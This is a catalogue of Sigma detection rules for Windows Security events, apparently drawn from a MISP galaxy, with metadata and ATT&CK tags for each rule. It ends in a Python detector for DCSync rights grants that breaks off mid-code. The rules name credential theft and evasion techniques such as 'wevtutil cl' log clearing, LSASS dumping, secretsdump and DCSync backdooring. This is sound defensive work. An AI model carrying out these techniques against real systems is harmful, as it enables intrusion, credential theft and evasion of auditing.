UUID c462f537-a1e3-41a6-b5fc-b2c2cef9bf82 which can be used as unique global reference for Suspicious PsExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['Unknown']
filename win_security_susp_psexec.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Azure AD Health Monitoring Agent Registry Keys Access

This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent. This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\SOFTWARE\Microsoft\Microsoft Online\Reporting\MonitoringAgent.

Internal MISP references

UUID ff151c33-45fa-475d-af4f-c2f93571f4fe which can be used as unique global reference for Azure AD Health Monitoring Agent Registry Keys Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/08/26
falsepositive ['Unknown']
filename win_security_aadhealth_mon_agent_regkey_access.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1012']
Related clusters

To see the related clusters, click here.

WMI Persistence - Security

Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.

Internal MISP references

UUID f033f3f3-fd24-4995-97d8-a3bb17550a88 which can be used as unique global reference for WMI Persistence - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community
creation_date 2017/08/22
falsepositive ['Unknown (data set is too small; further testing needed)']
filename win_security_wmi_persistence.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Password Protected ZIP File Opened

Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.

Internal MISP references

UUID 00ba9da1-b510-4f6b-b258-8d338836180f which can be used as unique global reference for Password Protected ZIP File Opened in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/09
falsepositive ['Legitimate used of encrypted ZIP files']
filename win_security_susp_opened_encrypted_zip.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Persistence and Execution at Scale via GPO Scheduled Task

Detects lateral movement using a GPO scheduled task, usually used to deploy ransomware at scale

Internal MISP references

UUID a8f29a7b-b137-4446-80a0-b804272f3da2 which can be used as unique global reference for Persistence and Execution at Scale via GPO Scheduled Task in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ["If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks"]
filename win_security_gpo_scheduledtasks.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.lateral_movement', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Security Eventlog Cleared

One of the Windows event logs has been cleared, e.g. caused by "wevtutil cl" command execution

Internal MISP references

UUID d99b79d2-0a6f-4f46-ad8b-260b6e17f982 which can be used as unique global reference for Security Eventlog Cleared in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/01/10
falsepositive ['Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)', 'System provisioning (system reset before the golden image creation)']
filename win_security_audit_log_cleared.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.001', 'car.2016-04-002']
Related clusters

To see the related clusters, click here.

Metasploit SMB Authentication

Alerts on Metasploit host's authentications on the domain.

Internal MISP references

UUID 72124974-a68b-4366-b990-d30e0b2a190d which can be used as unique global reference for Metasploit SMB Authentication in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Chakib Gzenayi (@Chak092), Hosni Mribah
creation_date 2020/05/06
falsepositive ['Linux hostnames composed of 16 characters.']
filename win_security_metasploit_authentication.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Hacktool Ruler

Detects events that are generated when using the hacktool Ruler by SensePost

Internal MISP references

UUID 24549159-ac1b-479c-8175-d42aea947cae which can be used as unique global reference for Hacktool Ruler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/31
falsepositive ['Go utilities that use staaldraad awesome NTLM library']
filename win_security_alert_ruler.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1087', 'attack.t1114', 'attack.t1059', 'attack.t1550.002']
Related clusters

To see the related clusters, click here.

Malicious Service Installations

Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.

Internal MISP references

UUID cb062102-587e-4414-8efa-dbe3c7bf19c6 which can be used as unique global reference for Malicious Service Installations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)
creation_date 2017/03/27
falsepositive ['Unknown']
filename win_security_mal_service_installs.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1003', 'car.2013-09-005', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Impacket PsExec Execution

Detects execution of Impacket's psexec.py.

Internal MISP references

UUID 32d56ea1-417f-44ff-822b-882873f5f43b which can be used as unique global reference for Impacket PsExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2020/12/14
falsepositive ['Unknown']
filename win_security_impacket_psexec.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Remote Service Activity via SVCCTL Named Pipe

Detects remote service activity via remote access to the svcctl named pipe

Internal MISP references

UUID 586a8d6b-6bfe-4ad9-9d78-888cd2fe50c3 which can be used as unique global reference for Remote Service Activity via SVCCTL Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['Unknown']
filename win_security_svcctl_remote_service.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.persistence', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Windows Event Auditing Disabled

Detects scenarios where system auditing (i.e. Windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one-off specific GPO modifications; however, it is recommended to perform these modifications in Active Directory anyway.

Internal MISP references

UUID 69aeb277-f15f-4d2d-b32a-55e883609563 which can be used as unique global reference for Windows Event Auditing Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron, Nasreddine Bencherchali (Nextron Systems)
creation_date 2017/11/19
falsepositive ['Unknown']
filename win_security_disable_event_auditing.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Rundll32 - Security

Detects obfuscated PowerShell via use of Rundll32 in scripts

Internal MISP references

UUID cd0f7229-d16f-42de-8fe3-fba365fbcb3a which can be used as unique global reference for Invoke-Obfuscation Via Use Rundll32 - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_use_rundll32_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

User Logoff Event

Detects a user log-off activity. Could be used for example to correlate information during forensic investigations

Internal MISP references

UUID 0badd08f-c6a3-4630-90d3-6875cca440be which can be used as unique global reference for User Logoff Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/14
falsepositive ['Unknown']
filename win_security_user_logoff.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.t1531']
Related clusters

To see the related clusters, click here.

Access To ADMIN$ Network Share

Detects access to ADMIN$ network share

Internal MISP references

UUID 098d7118-55bc-4912-a836-dc6483a8d150 which can be used as unique global reference for Access To ADMIN$ Network Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/04
falsepositive ['Legitimate administrative activity']
filename win_security_admin_share_access.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Secure Deletion with SDelete

Detects renaming of files during deletion with the SDelete tool.

Internal MISP references

UUID 39a80702-d7ca-4a83-b776-525b1f86a36d which can be used as unique global reference for Secure Deletion with SDelete in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/06/14
falsepositive ['Legitimate usage of SDelete']
filename win_security_susp_sdelete.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1070.004', 'attack.t1027.005', 'attack.t1485', 'attack.t1553.002', 'attack.s0195']
Related clusters

To see the related clusters, click here.

ADCS Certificate Template Configuration Vulnerability

Detects certificate creation with a template that allows a risky subject permission

Internal MISP references

UUID 5ee3a654-372f-11ec-8d3d-0242ac130003 which can be used as unique global reference for ADCS Certificate Template Configuration Vulnerability in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Orlinum , BlueDefenZer
creation_date 2021/11/17
falsepositive ['Administrator activity', 'Proxy SSL certificate with subject modification', 'Smart card enrollement']
filename win_security_adcs_certificate_template_configuration_vulnerability.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access']

Register new Logon Process by Rubeus

Detects potential use of Rubeus via registration of a new trusted logon process

Internal MISP references

UUID 12e6d621-194f-4f59-90cc-1959e21e69f7 which can be used as unique global reference for Register new Logon Process by Rubeus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community
creation_date 2019/10/24
falsepositive ['Unknown']
filename win_security_register_new_logon_process_by_rubeus.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

DCERPC SMB Spoolss Named Pipe

Detects the use of the spoolss named pipe over SMB. This can be used to trigger NTLM authentication from any machine that has the spooler service enabled.

Internal MISP references

UUID 214e8f95-100a-4e04-bb31-ef6cba8ce07e which can be used as unique global reference for DCERPC SMB Spoolss Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author OTR (Open Threat Research)
creation_date 2018/11/28
falsepositive ['Domain Controllers acting as printer servers too? :)']
filename win_security_dce_rpc_smb_spoolss_named_pipe.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Stdin - Security

Detects obfuscated PowerShell via Stdin in scripts

Internal MISP references

UUID 80b708f3-d034-40e4-a6c8-d23b7a7db3d1 which can be used as unique global reference for Invoke-Obfuscation Via Stdin - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_stdin_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Metasploit Or Impacket Service Installation Via SMB PsExec

Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation

Internal MISP references

UUID 6fb63b40-e02a-403e-9ffd-3bcc1d749442 which can be used as unique global reference for Metasploit Or Impacket Service Installation Via SMB PsExec in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bartlomiej Czyz, Relativity
creation_date 2021/01/21
falsepositive ['Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name']
filename win_security_metasploit_or_impacket_smb_psexec_service_install.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.t1570', 'attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

AD Object WriteDAC Access

Detects WRITE_DAC access to a domain object

Internal MISP references

UUID 028c7842-4243-41cd-be6f-12f3cf1a26c7 which can be used as unique global reference for AD Object WriteDAC Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/09/12
falsepositive ['Unknown']
filename win_security_ad_object_writedac_access.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1222.001']
Related clusters

To see the related clusters, click here.

Kerberos Manipulation

Detects a failed Kerberos TGT issue operation. This can be a sign of manipulation of TGT messages by an attacker.

Internal MISP references

UUID f7644214-0eb0-4ace-9455-331ec4c09253 which can be used as unique global reference for Kerberos Manipulation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/02/10
falsepositive ['Faulty legacy applications']
filename win_security_susp_kerberos_manipulation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1212']
Related clusters

To see the related clusters, click here.

First Time Seen Remote Named Pipe

This detection excludes known named pipes accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes

Internal MISP references

UUID 52d8b0c6-53d6-439a-9e41-52ad442ad9ad which can be used as unique global reference for First Time Seen Remote Named Pipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['Update the excluded named pipe to filter out any newly observed legit named pipe']
filename win_security_lm_namedpipe.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Obfuscated IEX Invocation - Security

Detects all variations of obfuscated PowerShell IEX invocation code generated by the Invoke-Obfuscation framework from the code block linked in the references

Internal MISP references

UUID fd0f5778-d3cb-4c9a-9695-66759d04702a which can be used as unique global reference for Invoke-Obfuscation Obfuscated IEX Invocation - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniel Bohannon (@Mandiant/@FireEye), oscd.community
creation_date 2019/11/08
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_obfuscated_iex_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Transferring Files with Credential Data via Network Shares

Transferring files with well-known filenames (sensitive files with credential data) using network shares

Internal MISP references

UUID 910ab938-668b-401b-b08c-b596e80fdca5 which can be used as unique global reference for Transferring Files with Credential Data via Network Shares in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/10/22
falsepositive ['Transferring sensitive files for legitimate administration work by legitimate administrator']
filename win_security_transf_files_with_cred_data_via_network_shares.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.001', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

Remote PowerShell Sessions Network Connections (WinRM)

Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986

Internal MISP references

UUID 13acf386-b8c6-4fe0-9a6e-c4756b974698 which can be used as unique global reference for Remote PowerShell Sessions Network Connections (WinRM) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/09/12
falsepositive ['Legitimate use of remote PowerShell execution']
filename win_security_remote_powershell_session.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious LDAP-Attributes Used

Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.

Internal MISP references

UUID d00a9a72-2c09-4459-ad03-5e0a23351e36 which can be used as unique global reference for Suspicious LDAP-Attributes Used in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author xknow @xknow_infosec
creation_date 2019/03/24
falsepositive ['Companies, who may use these default LDAP-Attributes for personal information']
filename win_security_susp_ldap_dataexchange.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.t1001.003', 'attack.command_and_control']
Related clusters

To see the related clusters, click here.

LSASS Access From Non System Account

Detects potential Mimikatz-like tools accessing LSASS from a non-system account

Internal MISP references

UUID 962fe167-e48d-4fd6-9974-11e5b9a5d6d1 which can be used as unique global reference for LSASS Access From Non System Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/06/20
falsepositive ['Unknown']
filename win_security_lsass_access_non_system_account.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Possible Impacket SecretDump Remote Activity

Detects AD credential dumping using the Impacket secretdump hacktool (HKTL)

Internal MISP references

UUID 252902e3-5830-4cf6-bf21-c22083dfd5cf which can be used as unique global reference for Possible Impacket SecretDump Remote Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, wagga
creation_date 2019/04/03
falsepositive ['Unknown']
filename win_security_impacket_secretdump.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002', 'attack.t1003.004', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

ADCS Certificate Template Configuration Vulnerability with Risky EKU

Detects certificate creation from a template that allows risky subject permissions together with a risky EKU

Internal MISP references

UUID bfbd3291-de87-4b7c-88a2-d6a5deb28668 which can be used as unique global reference for ADCS Certificate Template Configuration Vulnerability with Risky EKU in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Orlinum, BlueDefenZer
creation_date 2021/11/17
falsepositive ['Administrator activity', 'Proxy SSL certificate with subject modification', 'Smart card enrollment']
filename win_security_adcs_certificate_template_configuration_vulnerability_eku.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access']

Possible DC Shadow Attack

Detects DCShadow via the creation of a new SPN

Internal MISP references

UUID 32e19d25-4aed-4860-a55a-be99cb0bf7ed which can be used as unique global reference for Possible DC Shadow Attack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah
creation_date 2019/10/25
falsepositive ['Valid on domain controllers; exclude known DCs']
filename win_security_possible_dc_shadow.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1207']
Related clusters

To see the related clusters, click here.

Windows Defender Exclusion Deleted

Detects the deletion of a Windows Defender exclusion. This could indicate an attacker covering their tracks by removing exclusions they added earlier.

Internal MISP references

UUID a33f8808-2812-4373-ae95-8cfb82134978 which can be used as unique global reference for Windows Defender Exclusion Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @BarryShooshooga
creation_date 2019/10/26
falsepositive ['Unknown']
filename win_security_windows_defender_exclusions_write_deleted.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

DPAPI Domain Backup Key Extraction

Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers

Internal MISP references

UUID 4ac1f50b-3bd0-4968-902d-868b4647937e which can be used as unique global reference for DPAPI Domain Backup Key Extraction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/06/20
falsepositive ['Unknown']
filename win_security_dpapi_domain_backupkey_extraction.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.004']
Related clusters

To see the related clusters, click here.

T1047 Wmiprvse Wbemcomn DLL Hijack

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network for a WMI DLL Hijack scenario.

Internal MISP references

UUID f6c68d5f-e101-4b86-8c84-7d96851fd65c which can be used as unique global reference for T1047 Wmiprvse Wbemcomn DLL Hijack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)
creation_date 2020/10/12
falsepositive ['Unknown']
filename win_security_wmiprvse_wbemcomn_dll_hijack.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Unauthorized System Time Modification

Detect scenarios where a potentially unauthorized application or user is modifying the system time.

Internal MISP references

UUID faa031b5-21ed-4e02-8881-2591f98d82ed which can be used as unique global reference for Unauthorized System Time Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron
creation_date 2019/02/05
falsepositive ['HyperV or other virtualization technologies with binary not listed in filter portion of detection']
filename win_security_susp_time_modification.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.006']
Related clusters

To see the related clusters, click here.

NetNTLM Downgrade Attack

Detects a NetNTLM downgrade attack

Internal MISP references

UUID d3abac66-f11c-4ed0-8acb-50cc29c97eed which can be used as unique global reference for NetNTLM Downgrade Attack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), wagga
creation_date 2018/03/20
falsepositive ['Unknown']
filename win_security_net_ntlm_downgrade.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

VSSAudit Security Event Source Registration

Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.

Internal MISP references

UUID e9faba72-4974-4ab2-a4c5-46e25ad59e9b which can be used as unique global reference for VSSAudit Security Event Source Registration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)
creation_date 2020/10/20
falsepositive ['Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\Windows\System32\VSSVC.exe.']
filename win_security_vssaudit_secevent_source_registration.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Password Change on Directory Service Restore Mode (DSRM) Account

The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.

Internal MISP references

UUID 53ad8e36-f573-46bf-97e4-15ba5bf4bb51 which can be used as unique global reference for Password Change on Directory Service Restore Mode (DSRM) Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/02/19
falsepositive ['Initial installation of a domain controller']
filename win_security_susp_dsrm_password_change.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Service Registry Key Read Access Request

Detects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.

Internal MISP references

UUID 11d00fff-5dc3-428c-8184-801f292faec0 which can be used as unique global reference for Service Registry Key Read Access Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Center for Threat Informed Defense (CTID) Summiting the Pyramid Team
creation_date 2023/09/28
falsepositive ['Likely from legitimate applications reading their key. Requires heavy tuning']
filename win_security_registry_permissions_weakness_check.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation STDIN+ Launcher - Security

Detects obfuscated use of stdin to execute PowerShell

Internal MISP references

UUID 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974 which can be used as unique global reference for Invoke-Obfuscation STDIN+ Launcher - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_stdin_services_security.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Powerview Add-DomainObjectAcl DCSync AD Extend Right

Detects the backdooring of a domain object to grant the rights associated with DCSync to a regular user or machine account, for example with the PowerView Add-DomainObjectAcl cmdlet and its DCSync extended-right option. Those rights let the principal re-obtain the password hashes of any user or computer at will.

Internal MISP references

UUID 2c99737c-585d-4431-b61a-c911d86ff32f which can be used as unique global reference for Powerview Add-DomainObjectAcl DCSync AD Extend Right in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat
creation_date 2019/04/03
falsepositive ["New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account."]
filename win_security_account_backdoor_dcsync_rights.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.
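The false-positive note above tells the analyst to inspect the SIDs inside the value attribute of event 5136. The following Python is an added example, not the Sigma rule's own logic: it parses the SDDL string carried in a constructed 5136 record for the nTSecurityDescriptor attribute, extracts the object-specific ACEs that grant the three replication extended rights that make DCSync possible (their GUIDs are the well-known Active Directory values), and reports any trustee that is not a domain controller or admin principal. The Security-log field names (EventID, AttributeLDAPDisplayName, AttributeValue, ObjectDN, SubjectUserName) are real; the baseline of expected trustees and the sample records are assumptions.

```python
import re
from typing import Dict, List

# Extended-right GUIDs that together allow a principal to replicate directory secrets (DCSync).
DCSYNC_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed baseline of principals that legitimately hold these rights: SDDL aliases for
# Enterprise Domain Controllers, Domain Controllers, Domain/Enterprise Admins and
# BUILTIN\Administrators, plus the domain RIDs for RODCs (498), Domain Admins (512),
# Domain Controllers (516) and Enterprise Admins (519).
EXPECTED_ALIASES = {"ED", "DD", "DA", "EA", "BA"}
EXPECTED_RIDS = {"498", "512", "516", "519"}
DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")

# One SDDL ACE: (type;flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*)\)")
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS, spelled "CR" in SDDL


def is_expected_trustee(trustee: str) -> bool:
    """True for principals that normally hold replication rights."""
    if trustee in EXPECTED_ALIASES or trustee == "S-1-5-9":  # S-1-5-9 = Enterprise Domain Controllers
        return True
    m = DOMAIN_SID_RE.match(trustee)
    return bool(m and m.group(1) in EXPECTED_RIDS)


def grants_control_access(rights: str) -> bool:
    """SDDL rights are either two-letter codes run together ("RPWPCR") or a hex access mask."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & CONTROL_ACCESS)
    return "CR" in {rights[i:i + 2] for i in range(0, len(rights), 2)}


def suspicious_dcsync_grants(event: Dict[str, str]) -> List[Dict[str, str]]:
    """Replication-right ACEs in a 5136 nTSecurityDescriptor change whose trustee is outside the baseline."""
    if str(event.get("EventID")) != "5136":
        return []
    if event.get("AttributeLDAPDisplayName", "").lower() != "ntsecuritydescriptor":
        return []
    findings = []
    for ace_type, _flags, rights, obj_guid, _inherit, trustee in ACE_RE.findall(event.get("AttributeValue", "")):
        # Only object-specific allow ACEs carrying a control-access right can grant an extended right.
        if ace_type != "OA" or not grants_control_access(rights):
            continue
        right_name = DCSYNC_RIGHTS.get(obj_guid.lower())
        if right_name is None or is_expected_trustee(trustee):
            continue
        findings.append({"object": event.get("ObjectDN", ""), "right": right_name,
                         "trustee": trustee, "by": event.get("SubjectUserName", "")})
    return findings


# Constructed sample records, not real logs. The first grants both replication rights to RID 1105
# (a regular user); the second is a domain controller touching the DC and RODC groups only.
SAMPLE_EVENTS = [
    {
        "EventID": "5136", "SubjectUserName": "jdoe", "ObjectDN": "DC=corp,DC=local",
        "AttributeLDAPDisplayName": "nTSecurityDescriptor",
        "AttributeValue": "O:DAG:DAD:AI(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
                          "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1105)"
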